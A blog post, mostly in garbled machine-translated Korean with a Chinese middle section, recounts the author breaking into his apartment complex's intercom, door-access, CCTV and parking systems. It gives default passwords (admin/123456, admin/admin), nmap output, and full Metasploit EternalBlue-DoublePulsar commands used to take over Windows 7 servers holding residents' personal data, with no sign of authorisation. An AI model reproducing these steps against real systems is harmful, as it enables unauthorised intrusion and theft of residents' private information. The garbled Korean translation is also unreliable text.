머리말
어린 시절 블로거는 사람이 간단하게하기를 좋아하지만, 현실은 항상 당신과 같은 상수 이동 등의 실수로 너무 많은 놀라움을 제공합니다.
블로거는 자신의 실제 집으로 이사 할 때 이제 10 일 이동에 마지막으로 충분한 운동을 수집하기 위해 앞뒤로 10 번 이동에 대학을 졸업했다.
, 30 분 동안 두 개의 침실 집을 구입하는 물린 누출을 획득시 (15)의 끝은 가장 낮은 가격을 이용했다 17 년 마침내 내가 마지막으로 더 이상 이동이없는 초기 18 블로거에 살고 이동을 계획하고, 혁신을 승인, 분위기 기쁨, 다음 집안일의 다양한 살기 바쁜 시작했다, 그래서이 달 블로그, 매우 바쁜보다 적은 있지만 내용은 내부 천천히 노트입니다.
블로거가 자신의 선전 지능형 시스템의 셀 장소에서 구입, 그래서 은퇴하고 오른쪽에 블로거들이 쉽게 간단한 보안 시스템 세포의 침윤을 수행하는 보안 시스템의 다양한 수상 할 때 앉아,이 기사가 와서 구체적으로 설명한다.
준비된
시작하기 전에 우리는 침투 테스트의 과정을 통해 마음에 뇌를 수선 할 수 있도록, 블로거 바에서 온라인 블로거의 침투의 예로서 간주, 환경의 간단한 설명 할 필요가 쇼핑몰 옆에 다양한 상점이있다 침투 과정의 모든 종류, 설명하기 (11) 일 것이다.
우리는 네트워크 침투 테스트 시스템에있는 글쎄, 말도,이 항목은 어디서 찾을 항목을 가지고있는 자연적, 말을하지 않습니까?
우리 모두가 알다시피,이 내부 네트워크의 일반 영역 직접, 앞으로 때문에 상대적으로 안전 할 수있는 하나의 발판이, 그이 격리를 할 경우에도, 외부 네트워크에 연결되어 있지,하지만 일반적으로 네트워크 외부 아니다된다 같은 LAN 시스템의 두 가지 뛰어난 기능을 가지고 있습니다.
첫 번째 포인트는 정말 패턴 투싼 휴식, 그것은 기본적으로 모든 권리 외부 네트워크에 연결되지 않는만큼, 네트워크 내 기기에 대한 국민의 신뢰를 유지 앉아서 휴식을 취할 것입니다.
두 번째 포인트는 바이러스 서명은 수천 년 동안 업데이트되지 않습니다이며,이 경우에도, 어떤 보안 소프트웨어가 없다는 것입니다, 가구와 같은 외부 네트워크 업데이트 울 나중에 검증 할 수있는 기계가 없습니다.
그래서 내부 LAN의 두 가지 특성이 매우 취약 있고, 단지 입구, 전체 네트워크를 통해 기본적으로 게임을 찾아, 입구는 아주 좋아 보이는 것입니다.
우리 모두가 알다시피, 당신이 서로를 볼 수 있습니다, 당신은 인터콤 음성 수,이 물건은 때때로 방문자로, 당신은 아래층 문 액세스 할 수있는이 물건 원격으로 문을 열어, 매우 사용하기 쉽고, 모든 가정은 인터폰을 설치 한 지역에있다 얼굴은 호텔과 경고를, 또한 비디오를 녹화 할 수 있습니다뿐만 아니라 그뿐만 아니라, 심지어 가정 화재 경보기와 함께 불에 직접 통지, 당신은 또한 매우 풍부해질 수있는 무료 LAN 음성 채팅 기능을 다른 주민를 호출 할 수 있습니다 .
당신이 바로,의, 우리는 같은이 강력한 비디오 인터콤 모습을 살펴 처음부터 장치의 전체 프로세스를 테스트 침투하게 추측
기본적 약한 암호에 의해 엔지니어링 모드를 입력 IP 주소를 얻을, 게이트웨이 서버뿐만 아니라 주소
무전기를 제거
제가 르가,이 케이블이 너무 짧은 문질러 도구
네트워크 케이블 접속 스위치, 라우터, 노트북 등과 같은 장비를 쉽게 확장 통신 정확한 최종 확인은
침공이 침투 한 후 기본 준비 작업을 시작합니다.
스캐닝
라인과 빛 고양이 네트워크에서 이전의 경험에 의하면, 여기에 IP 주소가 확실히 고정되고, 가구의 수는 자신의 IP 주소를 사용하도록 바인딩에 문제가 지금 매우 당황하지 무슨 경우, 시험하는 경우 많은 소유자는 여전히 더 쇼 없으며, IP 주소 풀을 무료을 많이 가지고, 다른 세입자의 IP 주소를 사용은 한 라인에 충돌없이 같은 장비에 나서서 :
전하 보물, 라우터, 노트북
전력은 고정 IP 라우터를 제공 한 후
그래서 노트북은 정말 멋지다는 IP 무선 WiFi를 통해 세그먼트 및 스캔 소프트웨어 화가 IP 스캐너, 그들과 그래픽 인터페이스의 내 사용을 스캔 할 수 있으며, 속도도 빠릅니다
192.165.0.1/16 IP 주소의 신속한 분류를 위해, 살아 호스트 1256 발견 스캔하기 위해 모든 가능한 수출의 IP 주소, 파이썬 스크립트의 IP HTTP 응답 헤더를 분류하는 방법을 쓰기
이 마지막은 다음과 같은 범주로 나누어 져 있습니다 :
첫 번째 범주
나 mini_httpd / 1.19 19dec2003
기계의이 유형은 모든 액세스 제어, 홈 인터콤 가구를 포함, BAN 액세스 제어 로비, 엘리베이터, 주차장 액세스 제어, 도어 액세스 제어 세포, IP 주소 및 관리자 / 123456 취약한 암호를 원격으로 동시에 제어 할 수 있습니다 다음과 같이 텔넷도 연결, 암호 변경, 도어 제어를 엽니 시간, 액세스 제어 시스템 암호가 포함 된 매우 전체 페이지 기능 관리, 가정, 재산 콜센터에 전화 등 공장 설정을 복원 할 수 있습니다, 기능이 풍부한 인터페이스입니다
두 번째 범주
DNVRS-Webs Hikvision-webs/ App-webs/
这三种都是海康威视的监控探头,登录界面有以下几种
只有中间那种可以无限次输错密码进行爆破,其他两种都是输错五次就锁定
第三类
Net Keybord-Webs
这是一个网络键盘,通常用于操作监控的云台转动,比如球机的操作杆,登录界面
密码输错6次就锁定。
第四类
Boa/0.94.13
这个就有意思了,这是车牌识别系统,车辆入库的时候进行车牌识别,拍照存储的机器,也是全部admin admin弱口令直接登录,里面存储了些啥就不多说了,放两张图大家随意感受下
通过对这几种设备的归类扫描,最终确定了几台windows服务器
192.165.15.174 192.165.15.177 192.165.15.190 192.165.15.200 192.165.30.2
使用Nmap扫描结果如下
# Nmap 7.70 scan initiated Fri May 18 23:51:30 2018 as: nmap -iL something_ip.txt -oN scaned.txt -T4 --open Nmap scan report for 192.165.15.174 Host is up (0.063s latency). Not shown: 990 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1433/tcp open ms-sql-s 2383/tcp open ms-olap4 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown Nmap scan report for 192.165.15.190 Host is up (0.046s latency). Not shown: 992 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown Nmap scan report for 192.165.15.200 Host is up (0.030s latency). Not shown: 991 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown Nmap scan report for 192.165.30.2 Host is up (0.064s latency). Not shown: 990 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown # Nmap done at Fri May 18 23:51:46 2018 -- 5 IP addresses (4 hosts up) scanned in 16.25 seconds
很明显,四台机器都开了445端口,其中 192.165.15.174 开了1433端口,明显是sql server数据库,192.165.30.2还开了3389,这台机器是在门禁机里面见过,是门禁系统的服务器。
下面就重点对这几台机器入手,使用msf扫描下看是不是都存在smb漏洞(ms17_010),这漏洞在局域网真的超级好用,扫描截图
发现只有192.165.15.174 不存在ms17_010,其他三台都存在,操作系统分别是
192.165.15.190 win7 sp1 x86
192.165.15.200 win7 sp1 x64
192.165.30.2 win7 sp1 x86
现在目标就非常明确了,但是有个问题,msf自带的利用模块只针对x64版本的操作系统,对于x86版本的系统只能使用其他工具,emmmmm....
一阵思考之后,博主决定先搞定那台64位win7,为了能够正常的反弹shell回来,我把路由器改成桥接模式,本机电脑设置固定IP,这样我的机器就跟目标机器处于相同网络拓扑,反弹自然无压力
so...
msf的用法我这里就不多说了,如果真不知道,可以留言...给出一张run vnc的截图,拿下监控系统
有趣的是这台机器上居然安装了360安全卫士...
注意看上面一张图的那个监控室,管理员面前有三台机器,所以另外两台我下一步就要搞定。
上面说64位win7已经拿下,现在搞定32位机器,使用 https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit 这里的Ruby脚本即可,需要注意的是如果本机是kali 64位的需要安装 wine32,安装方法是
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
而且全程操作需要在root下面,安装完wine32后执行一下 wine32 cmd.exe 这样会自动在/root下面创建.wine目录,这个目录msf会用到
使用
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
将脚本克隆到本地,然后把目录下的deps 目录和rb文件复制到msf的modules路径下,这样既可以使用了(PS:我这里只复制了rb脚本,deps没有复制过去所以命令不太一样),具体命令如下
msf > use exploit/windows/smb/eternalblue_doublepulsar msf exploit(windows/smb/eternalblue_doublepulsar) > set ETERNALBLUEPATH /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/ ETERNALBLUEPATH => /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/ msf exploit(windows/smb/eternalblue_doublepulsar) > set DOUBLEPULSARPATH /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/ DOUBLEPULSARPATH => /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/ msf exploit(windows/smb/eternalblue_doublepulsar) > set TARGETARCHITECTURE x86 TARGETARCHITECTURE => x86 msf exploit(windows/smb/eternalblue_doublepulsar) > set PROCESSINJECT wlms.exe PROCESSINJECT => wlms.exe msf exploit(windows/smb/eternalblue_doublepulsar) > show targets Exploit targets: Id Name -- ---- 0 Windows XP (all services pack) (x86) (x64) 1 Windows Server 2003 SP0 (x86) 2 Windows Server 2003 SP1/SP2 (x86) 3 Windows Server 2003 (x64) 4 Windows Vista (x86) 5 Windows Vista (x64) 6 Windows Server 2008 (x86) 7 Windows Server 2008 R2 (x86) (x64) 8 Windows 7 (all services pack) (x86) (x64) msf exploit(windows/smb/eternalblue_doublepulsar) > set target 8 target => 8 msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost set rhost MSF은 (윈도우 / SMB / eternalblue_doublepulsar)이> 192.165.15.190 설정되는 rhost 이용 되는 rhost => 192.165.15.190 MSF 익스플로잇 (윈도우 / SMB / eternalblue_doublepulsar)> 설정이 lhost 192.165.7.11 이 lhost => 192.165.7.11 MSF 익스플로잇 (윈도우 / SMB / eternalblue_doublepulsar )> 이용
아니나 다를까, 다음 공격은 공격 샷의 성공을 주어, 성공.
첫 번째는 액세스 제어 시스템, 안티 바이러스 소프트웨어는, 액세스 카드 관리 소프트웨어의 일부를 설치하지 않은 것입니다
사용할 때 두 번째 시스템은 저장 용량 차량 관리 시스템의 차량이며
개요
음, 지금까지 간단한 세포 침투 테스트의 보안 시스템의 블로거가 성공적으로 소유자의 개인 정보, 차량 정보, 차량 접근 등록 정보를 포함하여 서버가 민감한 많은 문서를 발견하는 중요한 시스템을, 원 등을 의심 할 여지가 전화 통화를 희롱의 모든 종류의,이 분마다 공개하는 것입니다 없습니다.
추신
보안은 전체입니다, 제방의 수천 마일 위험한 일, 다음 복사 액세스 카드뿐만 아니라 포괄적 인 줄을 쓰기 위해 함께 단속을 자동으로 제어 할 수 있습니다.